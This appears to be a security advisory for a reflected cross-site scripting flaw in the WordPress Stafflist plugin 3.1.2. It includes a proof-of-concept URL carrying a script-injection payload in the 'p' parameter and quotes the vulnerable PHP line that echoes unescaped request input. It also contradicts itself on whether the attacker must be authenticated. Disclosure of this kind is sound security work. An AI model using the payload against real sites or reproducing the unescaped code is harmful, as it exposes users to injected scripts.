WordPress Stafflist 3.1.2 Cross Site Scripting

2022.05.03
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: WordPress Plugin stafflist 3.1.2 - Reflected XSS (Authenticated) # Date: 05-02-2022 # Exploit Author: Hassan Khan Yusufzai - Splint3r7 # Vendor Homepage: https://wordpress.org/plugins/stafflist/ # Version: 3.1.2 # Tested on: Firefox # Contact me: h [at] spidersilk.com # Summary: A cross site scripting reflected vulnerability has been identified in WordPress Plugin stafflist version less then 3.1.2. that allows unauthenticated users to run arbitrary javascript code inside WordPress using Stafflist Plugin. # POC http://localhost:10003/wp-admin/admin.php?page=stafflist&remove=1&p=1%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E # Vulnerable Parameters p and s parameters are vulnerable. # Vulnerable Code: $html = ($cur > 1 ? "<p class='pager'><a href='{$stafflisturl}&p=".($cur-1)."&s={$_GET['s']}'>Previous </a></p>" : ""); //<


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top